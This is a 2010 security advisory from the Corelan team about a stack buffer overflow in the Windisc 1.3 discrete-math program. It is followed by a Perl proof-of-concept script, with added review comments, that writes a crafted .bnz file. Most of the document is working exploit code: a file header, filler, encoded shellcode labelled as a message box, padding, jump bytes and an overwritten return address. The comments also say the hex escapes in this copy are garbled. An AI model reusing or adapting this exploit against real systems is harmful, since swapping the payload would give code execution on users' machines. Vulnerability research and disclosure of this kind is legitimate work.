
Windisc Stack Buffer Overflow Vulnerability

Posted on 17 March 2010

=========================================== Windisc Stack Buffer Overflow Vulnerability =========================================== 0x00 : Vulnerability information -------------------------------- [*] Product : Windisc [*] Version : 1.3 [*] Vendor : RParris [*] URL : http://math.exeter.edu/rparris/windisc.html [*] Platform : Windows [*] Type of vulnerability : Stack Buffer overflow [*] Risk rating : Medium [*] Issue fixed in version : Unknown [*] Vulnerability discovered by : Rick2600 [*] Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ 0x01 : Vendor description of software ------------------------------------- From the vendor website: Windisc is a collection of subprograms that deal with discrete-math topics such as apportionment, voting power, voting methods, and network analysis (traveling salesman problem, map-coloring, etc). 0x02 : Vulnerability details ---------------------------- In order to trigger the vulnerability a user needs to load a crafted Banzhaf (.bnz) file. EAX 00A193BC ECX 0000000B EDX 00A193BC EBX 00A16638 ESP 0012F778 ASCII "AAAAAAAAAAAAAAAAAA..." EBP 41414141 ESI 00A4D158 EDI 0000000C EIP 41414141 0x03 : Vendor communication --------------------------- [*] Feb 15 2010: Author contacted (no replies) [*] Mar 08 2010: Vulnerability disclosed 0x04 : Exploit/PoC ------------------ Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. 
# PoC generator from section 0x04 of the advisory above.  Running it only
# prints a banner and writes one file, named in $sploitfile, into the
# current directory; it does not interact with Windisc itself.  Section
# 0x02 of the advisory states that loading such a .bnz file in Windisc 1.3
# triggers the stack buffer overflow (EBP/EIP shown as 41414141).
#
# NOTE(review): as rendered on this page the hex escapes appear to have
# lost their backslashes (the literals read as plain text "x77x03..."),
# so this copy is not byte-for-byte the original script and the file it
# writes should not be used as a reference sample or hashed as an IoC.

# Banner.
print "|------------------------------------------------------------------| ";
print "| __ __ | ";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | ";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | ";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | ";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | ";
print "| | ";
print "| http://www.corelan.be:8800 | ";
print "| | ";
print "|-------------------------------------------------[ EIP Hunters ]--| ";
print "[+] PEAnut Discrete Math Package Exploit ";

# Output file name; written in the current working directory.
my $sploitfile="windisc_poc.bnz";

# Leading bytes of the generated file, as laid out by the author.  The
# payload below is appended directly after this block.
my $header= "x77x03x00x00x03x00x00x00x36x00x00x00x3bx00x00x00".
"x50x03x00x00x3cx02x00x00x00x00x00x00x01x00x00x00".
"x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00".
"x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00".
"x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00".
"x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31".
"x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02".
"x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31".
"x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x24xf9x12x00x91x74x49x00".
"x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74x49".
"x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74".
"x49x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91".
"x74x49x00x1cx83x4bx00x00x00x00x00x00x13x00x13x00".
"x13x00x13x00x13x00x13x00x13x00x04x00x00x00x06x00".
"x13x00x13x00x13x00x13x00x13x00x00x00x00x00xffxff".
"xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf".
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00".
"x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00".
"x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c".
"xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80".
"x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde".
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff".
"x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff".
"xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde".
"xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1".
"xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1".
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96".
"xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd".
"x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28".
"x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x0cx00".
"x00x00x07x00x00x00xffxffxffxffx01x00x00x00x00x00".
"x00x00xffxffxffxffxffxffxffxffxb1x00x00x00x05x00".
"x00x00x32x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x0bx00x00x00x16x00x00x00x2fx00".
"x00x00x24x00x00x00x1ex00x00x00x24x00x00x00x2dx00".
"x00x00x20x00x00x00x23x00x00x00x11x00x00x00x1fx00".
"x00x00x0bx00x00x00x07x00";

# Payload blob.  The author's own label is "MsgBox Corelan Team"; nothing
# else on this page documents what it does.  Its length is used below to
# size the padding.
#MsgBox Corelan Team
my $shellcode=
"x2bxc9xdbxcaxb1x4bxd9x74x24xf4x5axbfxc8xac" .
"x87x72x31x7ax16x83xeaxfcx03x7axdax4ex72x24" .
"xebx4ex4cx12xb8x7fxcbx2fxbdxf4x53x3cx4ax4a" .
"x40x6cx12xc0x6exdcxf4x5dx68x57x48x72x2bx8e" .
"xdax72xd3x50xbaxf9xbfx74x1ex75x7ax49xd5xdd" .
"x80xc9xe8x37x01x63xf2x4cx4cx54x03xb8x92xa3" .
"x4axb5x61x47x4dx27xb8xa8x7cx77x47xfaxfaxb7" .
"xccx09xc3xf7x20x0fx04xeexcaxf0x75x0ex17x73" .
"xadxd9x1dx55x26x43xfax68xd3x12x89x67x68x50" .
"xd7x6bx6fx8dx63x97xe4x50x9cx11xbex76x40x43" .
"xfdxdax28xd1xe9x82x36x2ax16x45xcfx54x2cx5e" .
"xd0x56xacxdex17x52xacxe0x97x62x62x95x71x57" .
"x92x10x7ex58x62xe8x0dx3dx10x21xc0x93xb0x29" .
"x48xecxd0x92x90xecx20x5dxdexe2xccx1fx07x18" .
"x7fx08x84xddx7fxc8x43x7fx32x74x12x6cxc4x84" .
"x15x6dx5dx61x9cxafxb4xb1x60xd0xb9x18x12x52" .
"x41x2cxddx2cx88x26x1ex2fx0axdfx81xd0xf5xe0" .
"x57x9bxf6xe0x57x1bx5dx1bx21x26xb4xebxcex58" .
"xb9xb2x9dxf7x17xa3xe8x08x68xccxfcxe2x96x33" .
"xffx57x7fx29xffx67x7fx17xcexb5x2dxf4x61x68" .
"x2ex2axb0x4cx80x34xe6x44xc8x2dxf6xaaxf7xe2" .
"x7ex3bx62x67x81x2bx8dx98x7ex54x0ex08xf3xce" .
"xfcxb7x9dx30xa8x52x03x5cx70xedxb4xf0x15x69" .
"x3bx07";

print "[+] Preparing payload ";

# File layout, in order: $header, 300 filler bytes ("A"), $shellcode,
# "B" padding so that shellcode plus padding is exactly 772 bytes, two
# short trailing literals, and finally the 32-bit little-endian value
# 0x00405437 (pack "V").  The roles of the trailing bytes are not
# documented on this page.
#
# Detection note: the 300-byte run of "A" immediately after the header is
# a fixed, easily matched feature of files produced by this script.
my $payload = $header;
$payload .= "A" x 300;
$payload .= $shellcode;
$payload .= "B" x (772 - length($shellcode));
$payload .= "xE9xB9xFCxFFxFF";
$payload .= "xEBxF9x90x90";
$payload .= pack("V", 0x00405437);

print "[+] Writing payload to file ";

# NOTE(review): 2-arg open on a bareword handle with no error check; on
# failure the prints below still report success.  Output goes to the fixed
# name in $sploitfile in the current directory, in binary mode.
open(FILE,">$sploitfile");
binmode (FILE);
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to file $sploitfile ";
# ~ - [ [ : Inj3ct0r : ] ]

 
